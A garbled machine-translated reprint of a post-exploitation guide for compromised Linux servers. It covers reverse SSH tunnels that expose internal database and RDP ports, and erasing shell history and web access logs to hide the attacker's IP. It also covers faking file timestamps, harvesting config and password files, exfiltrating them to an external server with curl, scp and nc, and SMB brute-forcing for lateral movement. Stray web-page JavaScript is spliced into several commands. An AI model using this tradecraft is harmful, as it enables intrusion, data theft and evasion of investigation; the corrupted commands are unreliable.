Penetration testing in a variety of environments

Reprint Source: http://drops.wooyun.org/tips/411

Getshell:

After finding the Pointcut, the first is to play a shell, generally I use back.py

With NC use, the NC monitoring port is not said.

Back.py will automatically remove all history records to ensure that the shell is not recorded in the bash_history when it is broken.

SSH various poses

Bounce Intranet Port:

SSH has several more important parameters:

-F: After successful connection to the background, will not occupy the current Shell,shell broken will continue to execute, equivalent to Nohup and &. -N: Do not call the shell after the connection, use later. -R: Bounces the local network (which can be native or any intranet or even extranet port) to the SSH server

Usage:

First you want to have an external network IP SSH server, if the target network limit access port, you can open to common ports such as 80 or 443 above, you can directly change the settings or iptables mapping. You need to have root privileges on this server. Open port forwarding in Sshd_config, allowtcpforwarding Yes and Gateway Ports, if not previously opened, you need to restart sshd.

In addition, because the bounce port needs to let the target machine login to your SSH server, for security needs to establish a dedicated port forwarding user, Useradd to build a user, set the password and then into the/etc/passwd inside, the last ': ' After the shell location to change/ Sbin/nologin or/bin/false so that even if the other person logs your SSH password, you can't do anything to the server you're forwarding (such as forensics).

The role of-N:

Because the forwarding user does not have a shell, and if there is no-n word will automatically disconnect because the shell is not available,-n can avoid this.

Start forwarding:

Ssh-fnr to Bounce to the port: target native or internal and external IP: to bounce the target port forwarding dedicated user name @ your SSH server IP will ask you to forward the password of the user name, after the successful input will automatically switch to the background

Example 1:

Local forwarding: There is an Oracle port on the target machine at 1521, but it can only be accessed from the intranet. The right to lift, did not install Sqlplus and other tools, Webshell database management of various errors, but turned to the login user name and password. But my own machine has a navicat for Oracle?? The port forwarding user on the SSH server is named forward, and the server IP is 123.123.123.123

Ssh-fnr11521:127.0.0.1:1521[Email protected]123.123.123.123/*<! [Cdata[*/!function () {Try{vart="Currentscript"inchDocument?document.currentscript:function () { for(varT=document.getelementsbytagname ("Script"), e=t.length;e--;)if(T[e].getattribute ("Cf-hash"))returnT[e]} ();if(t&&t.previoussibling) {varE,r,n,i,c=t.previoussibling,a=c.getattribute ("Data-cfemail");if(a) { for(e="", R=parseint (A.substr (0,2), -), n=2; a.length-n;n+=2) I=parseint (A.SUBSTR (N,2), -) ^r,e+=string.fromcharcode (i); E=document.createtextnode (e), C.parentnode.replacechild (E,c)}}Catch(u) {}}();/*]]>*/

Note: The reason that the port is open to port 11521 is because the <1024 ports require root privileges to occupy, but also note that you bounce to the server port can not be blocked by iptables, or you will not be able to access from the extranet (nonsense)

After successful rebound, open navicat, create a new connection, IP input 123.123.123.123, Port input 11521, then username and password, PA pa?? It's connected.

Example 2:

Intranet IP Forwarding: In addition to forwarding localhost, you can also forward the other IP ports in the intranet, even in different network segments, as long as the intranet from the occupied machine access to the line. For example, the intranet has a Windows Server, IP 192.168.5.10, open 3389 port, but also only in the intranet access??

Ssh-fnr13389:192.168.5.10:3389[Email protected]123.123.123.123/*<! [Cdata[*/!function () {Try{vart="Currentscript"inchDocument?document.currentscript:function () { for(varT=document.getelementsbytagname ("Script"), e=t.length;e--;)if(T[e].getattribute ("Cf-hash"))returnT[e]} ();if(t&&t.previoussibling) {varE,r,n,i,c=t.previoussibling,a=c.getattribute ("Data-cfemail");if(a) { for(e="", R=parseint (A.substr (0,2), -), n=2; a.length-n;n+=2) I=parseint (A.SUBSTR (N,2), -) ^r,e+=string.fromcharcode (i); E=document.createtextnode (e), C.parentnode.replacechild (E,c)}}Catch(u) {}}();/*]]>*/

After successful rebound mstsc even 123.123.123.123:13389 can??

SSH to the port can be more open, is to pay attention to the ports forwarded to your server do not heavy.

When you're done, remember to turn it off:

PS Aux|grep SSH

In the process can see the SSH forwarding command, the PID kill the line. Alternatively, you can kill on the SSH server side,

Netstat-anp|grep sshd

SSH will record known_hosts, so the last time you wipe your butt remember to open the SSH user name of the home folder. SSH inside to clear the known_hosts

SSH Bounce Socks5 method

If SSH comes with the SOCKS5 server, you need an account that can log in locally, can be nologin, but must be able to login, if not root, socks port can only open to >1024 port. The principle is to first open the socks5 locally and then bounce the port of the local SOCKS5 server to the remote server.

Posture:

Ssh-fnd127.0.0.1:8080[Email protected]127.0.0.1/*<! [Cdata[*/!function () {Try{vart="Currentscript"inchDocument?document.currentscript:function () { for(varT=document.getelementsbytagname ("Script"), e=t.length;e--;)if(T[e].getattribute ("Cf-hash"))returnT[e]} ();if(t&&t.previoussibling) {varE,r,n,i,c=t.previoussibling,a=c.getattribute ("Data-cfemail");if(a) { for(e="", R=parseint (A.substr (0,2), -), n=2; a.length-n;n+=2) I=parseint (A.SUBSTR (N,2), -) ^r,e+=string.fromcharcode (i); E=document.createtextnode (e), C.parentnode.replacechild (E,c)}}Catch(u) {}}();/*]]>*/

This will open the SOCKS5 agent on the local 8080 port and then bounce back

Ssh-fnr18080:127.0.0.1:8080[Email protected]123.123.123.123/*<! [Cdata[*/!function () {Try{vart="Currentscript"inchDocument?document.currentscript:function () { for(varT=document.getelementsbytagname ("Script"), e=t.length;e--;)if(T[e].getattribute ("Cf-hash"))returnT[e]} ();if(t&&t.previoussibling) {varE,r,n,i,c=t.previoussibling,a=c.getattribute ("Data-cfemail");if(a) { for(e="", R=parseint (A.substr (0,2), -), n=2; a.length-n;n+=2) I=parseint (A.SUBSTR (N,2), -) ^r,e+=string.fromcharcode (i); E=document.createtextnode (e), C.parentnode.replacechild (E,c)}}Catch(u) {}}();/*]]>*/

This can be SOCKS5 agent to the 123.123.123.123 18080 port, you can use Proxychains and other support SOCKS5 agent tools to maximize the snooping intranet

Hidden traces of Linux

If you get the shell by other means, you need to remove the environment variables such as Histfile:

unset history histfile Histsave histzone history histlog; Export histfile=/dev/null;

Login SSH after the administrator with W view the current login user, so it is necessary to hide, recommend Xi4oyu Logtamper

Clear the contents of the log:

The log must be in text format, and you have permission to read and write??

' !/pattern/ ' filename > Temp && mv Temp filename

This principle is plainly to remove the original file in the specified content and then generate a new file, and then with the new overwrite the old, finish remember to restore the original properties with chmod. Example:

' !/123.123.123.123/ ' /var/log/httpd/access_log > Temp && mv temp/var/log/httpd/access_log

Remove all log records that contain 123.123.123.123. Can match multiple keywords:

' !/123.123.123.123|111.111.111.111|phpspy.php/ ' /var/log/httpd/access_log > Temp && mv temp/var/log/httpd/access_log

Modify File access | create | Modify TIME:

Changed to January 23, 2009 15:32

Batch modification Time:

For example, you changed a lot in a folder PHP inserted a bunch of words:

200901231532

Change all the file times in the current directory

Information collection:

" /usr/share/* " " . *.sh$|. *.pl$|. *.py$|. *.conf$|. *.cnf$|. *.ini$|. *\/.. *history$|. *\/.. *pass.*$|. *secret$"

Packaging various scripts and configuration files and a history log. Some of the environment zip needs some parameters to use, please modify it yourself

Collect all confin/var/www. PHP and pack it up.

Find/var'*conf*.php' -print | Zip config.zip [email protected]

Find the file that contains the specific content and the line shows up:

Grep-rpa--include=*.php ' ($PATTERNS) ' $SEARCH _dir

For example, in the Web directory for all PHP containing the word password

' Password ' /var

Pattern can use regular, can not specify the file type (very slow??)

File transfer:

Find what is needed, how to outward hair is also a problem, general large file with FTP,SCP, small file with NC.

ftp method:

If the target had curl, it would be easy.

CURL-V-t filename ftp://username:[email protected]

SCP Method:

Suitable for things such as IDs, the sshd can be opened to 443 of traditional encrypted traffic interface, SCP account needs to write and execute the shell permissions

SCP backup.tgz [email protected]123.123.123.123/*<! [Cdata[*/!function () {Try{vart="Currentscript"inchDocument?document.currentscript:function () { for(varT=document.getelementsbytagname ("Script"), e=t.length;e--;)if(T[e].getattribute ("Cf-hash"))returnT[e]} ();if(t&&t.previoussibling) {varE,r,n,i,c=t.previoussibling,a=c.getattribute ("Data-cfemail");if(a) { for(e="", R=parseint (A.substr (0,2), -), n=2; a.length-n;n+=2) I=parseint (A.SUBSTR (N,2), -) ^r,e+=string.fromcharcode (i); E=document.createtextnode (e), C.parentnode.replacechild (E,c)}}Catch(u) {}}();/*]]>*/:/tmp/backup.tgz

NC Method:

Listen first on the service side

Nc-l Port > file name

Then go to the server where you want to send the file

NC Server-side IP Port < file name

Sending small files is OK, and large files sometimes break.

From Linux to Windows

Sometimes you take the Linux server shell, want to cross to the windows of the machine, basically is through two means, one is for Windows service to exploit overflow, There is also the use of the user name and password collected on Linux and then put the shell through PsExec.

First of all to determine the location of the Windows host and open services, in the intranet to sweep open 445 and 3389 of the machine, the basic is Windows, sweep the time to pay attention, no matter what tools, as far as possible with the socket connect way sweep. Like a SYN scan if the intranet has IDs and so will certainly be found, connect mode scanning is relatively similar to the normal connection. After sweeping to the list of Windows machines, prepare the various usernames and passwords that you just collected under Linux, as well as some common weak passwords, generate a password dictionary and a dictionary of usernames, plus some windows ' user names, such as Administrator. Try password directly under Linux with Hydra, crack SMB password, luck, as long as sweep out one, you can use PsExec Getshell. With bad luck, there's only one way to spill the boat. If overflow is not possible, Windows host and Linux in the same network segment, you can also try to catch the SMB authentication packet through ARP spoof, and then hash out to crack or inject hash, but the movement will be relatively large, not the last recommended to use.

PsExec

There are several options, Metasploit inside the auxiliary inside the PsExec module, you can directly put an MSF reverse paylaod up. Alternatively, you can bounce the Windows Server's 445 port and find a Windows machine with PsExec. And a Python psexec,https://code.google.com/p/impacket/on a Linux machine that's directly in the net.

Penetration testing in a variety of environments